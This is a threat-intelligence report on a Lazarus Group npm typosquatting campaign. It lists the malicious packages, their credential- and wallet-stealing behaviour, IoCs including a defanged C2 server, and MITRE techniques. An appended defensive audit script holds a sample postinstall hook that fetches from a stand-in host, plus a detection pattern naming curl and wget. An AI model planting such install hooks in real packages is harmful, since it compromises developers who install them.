Lazarus npm Supply Chain Attack

Chapter 1: Threat Overview

The Lazarus Group uploaded six malicious npm packages intended to infiltrate developer environments, initiating a targeted supply chain attack. These packages, downloaded approximately 330 times, are designed to install backdoors for long-term access, steal cryptocurrency wallets, and harvest credentials. Using typosquatting, the attackers chose package names that closely resemble legitimate npm packages so that developers install them by mistake.

The Lazarus Group campaign involves the following six packages:
● is-buffer-validator – Mimics the original is-buffer package to steal credentials.
● yoojae-validator – Fake validation library used to extract sensitive data from the system.
● event-handle-package – Masquerades as an event-handling tool but installs a backdoor for remote access.
● array-empty-validator – Fake package designed to collect system and browser credentials.
● react-event-dependency – Claims to be a React utility but runs malware to compromise the developer environment.
● auth-validator – Mimics an authentication tool to steal login credentials and API keys.

Once installed, the packages execute malicious code that performs several harmful activities:
● System reconnaissance, including gathering information such as hostname, OS, and directory structure.
● Browser credentials theft, targeting login data stored in Chrome, Brave, and Firefox.
● Cryptocurrency wallet targeting, specifically searching for Solana’s id.json and Exodus’ exodus.wallet files to steal crypto assets.
● Deployment of BeaverTail malware and InvisibleFerret backdoor, which provide Lazarus with remote access and persistence within the compromised system.

Figure: code snippet that downloads malware payloads

According to the Socket Research Team, some of these malicious packages were also supported by fake GitHub repositories, making them appear more legitimate to developers and increasing the likelihood of successful compromise.

In addition to endangering individual engineers, this campaign also puts companies at risk if the malicious packages are incorporated into larger software projects. Once the packages are installed in a development pipeline, Lazarus might gain access to developer credentials, SSH keys, and cloud tokens, allowing lateral movement across large enterprises and widening the scope of the intrusion.

Additionally, in line with their previous attacks against cryptocurrency exchanges and financial systems, the campaign demonstrates Lazarus Group’s ongoing focus on cryptocurrency theft as a way to finance state-backed cybercrime operations. Although the six detected packages have been deleted from npm and GitHub, the aggressive nature of the campaign suggests a persistent, ongoing threat and underscores the necessity of continuous monitoring in software supply chain security.

Chapter 2: Indicators of Compromise (IoCs)

Malicious npm Packages:
● is-buffer-validator
● yoojae-validator
● event-handle-package
● array-empty-validator
● react-event-dependency
● auth-validator

npm Aliases and Email Addresses:
● edan0831 — edanjohn1991@gmail.com
● hottblaze — hottblaze012@gmail.com
● ricardoalexis07 — ricardoalexis0629@gmail.com
● alextucker0519 — alextucker@softworldnet.com
● elondavid — elondavid888@gmail.com
● kevin_tr — robustplutus@gmail.com

GitHub Accounts:
● edan0831
● alximmykola379
● alextucker0519
● elondavid888
● kevin-tra

GitHub Repositories:
● github.com/edan0831/is-buffer-validator
● github.com/alximmykola379/yoojae-validator
● github.com/alextucker0519/array-empty-validator
● github.com/elondavid888/react-event-dependency
● github.com/kevin-tra/auth-validator (defunct)

Primary C2 Server:
● 172.86.84[.]38

Associated Endpoints:
● hxxp://172.86.84[.]38:1224/uploads
● hxxp://172.86.84[.]38:1224/pdown
● hxxp://172.86.84[.]38:1224/client/9/902

Hashes:
● 38d365898fd6acbb4788e654e864922d (MD5)
● 281c2f8060dd3f0b244ae2282c3d3d406f8dd458 (SHA1)
● 6a104f07ab6c5711b6bc8bf6ff956ab8cd597a388002a966e980c5ec9678b5b0 (SHA256)

MITRE ATT&CK Techniques:
● T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
● T1608.001 — Stage Capabilities: Upload Malware
● T1204.002 — User Execution: Malicious File
● T1059.007 — Command and Scripting Interpreter: JavaScript
● T1027.013 — Obfuscated Files or Information: Encrypted/Encoded File
● T1546.016 — Event Triggered Execution: Installer Packages
● T1005 — Data from Local System
● T1082 — System Information Discovery
● T1083 — File and Directory Discovery
● T1217 — Browser Information Discovery
● T1555.003 — Credentials from Password Stores: Credentials from Web Browsers
● T1555.001 — Credentials from Password Stores: Keychain
● T1041 — Exfiltration Over C2 Channel
● T1105 — Ingress Tool Transfer
● T1119 — Automated Collection
● T1657 — Financial Theft

Chapter 3: Recommendations

Verify npm Packages

Check publisher reputation and download metrics; scrutinize open-source code for obfuscation and unexpected external calls.

Enhance Security Measures

Implement multi-layered protections such as sandboxing, robust endpoint protection, and blocking suspicious outbound connections.

Automation and Monitoring

Integrate automated dependency auditing into CI/CD pipelines, continuously monitor changes, and set up alerts for unexpected updates.

Education and Enforcement

Train teams to recognize typosquatting tactics and enforce strict supply chain security policies across all development practices.
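As an added illustration of the dependency-auditing and typosquat-recognition recommendations above (example code written for this page, not from the original report or from Socket): a Node.js check that compares installed package manifests against the package names listed in Chapter 2, flags look-alikes of an assumed allow-list of legitimate names, and flags install hooks that contact the network (T1546.016 / T1105 in the technique list). The allow-list, the sample manifests and the 203.0.113.10 address are constructed.

```javascript
// Added example, not from the original report: audit the package.json manifests of
// installed dependencies against the names this report lists, flag look-alikes of
// legitimate names (typosquatting), and flag network-reaching install hooks.
const KNOWN_MALICIOUS = new Set([
  "is-buffer-validator", "yoojae-validator", "event-handle-package",
  "array-empty-validator", "react-event-dependency", "auth-validator",
]);
// Constructed allow-list of legitimate names the look-alikes imitate.
const LEGIT = ["is-buffer", "react", "lodash"];
// Suffixes the campaign appended to real names ("is-buffer" -> "is-buffer-validator").
const SQUAT_SUFFIX = /-(validator|package|dependency)$/;
const NETWORK_HOOK = /https?:\/\/|\bcurl\b|\bwget\b|node -e/;
// Plain Levenshtein edit distance; a small distance to a known name is suspicious.
function levenshtein(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}
// manifests: array of parsed node_modules/<name>/package.json objects.
function auditManifests(manifests) {
  const findings = [];
  for (const { name, scripts = {} } of manifests) {
    if (KNOWN_MALICIOUS.has(name)) findings.push({ name, reason: "listed-ioc" });
    const stripped = name.replace(SQUAT_SUFFIX, "");
    for (const legit of LEGIT) {
      if (name === legit) continue;
      if (stripped === legit || levenshtein(name, legit) <= 2)
        findings.push({ name, reason: `lookalike-of:${legit}` });
    }
    for (const hook of ["preinstall", "install", "postinstall"]) {
      if (scripts[hook] && NETWORK_HOOK.test(scripts[hook]))
        findings.push({ name, reason: `network-install-hook:${hook}` });
    }
  }
  return findings; // review candidates for a human, not verdicts
}
// Constructed sample; 203.0.113.10 is a documentation address, not a real C2.
const SAMPLE_MANIFESTS = [
  { name: "is-buffer-validator", version: "1.0.0",
    scripts: { postinstall: "node -e \"require('http').get('http://203.0.113.10:1224/pdown')\"" } },
  { name: "is-bufer", version: "2.0.1" },
  { name: "lodash", version: "4.17.21" },
  { name: "left-pad", version: "1.3.0", scripts: { postinstall: "node ./build.js" } },
];
console.log(auditManifests(SAMPLE_MANIFESTS));
```

In a CI pipeline, feed it the package.json files under node_modules after `npm ci` and fail the build on any finding.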

References

HackRead. (2024, April 10). Lazarus Group backdoor found in fake NPM packages – A major supply chain attack. HackRead. https://hackread.com/lazarus-group-backdoor-fake-npm-packages-attack/

Cimpanu, C. (2024, April 9). North Korean Lazarus hackers infect hundreds via npm packages. BleepingComputer. https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-infect-hundreds-via-npm-packages/

Socket. (2024, April 10). Lazarus strikes npm again with a new wave of malicious packages. Socket Blog. https://socket.dev/blog/lazarus-strikes-npm-again-with-a-new-wave-of-malicious-packages
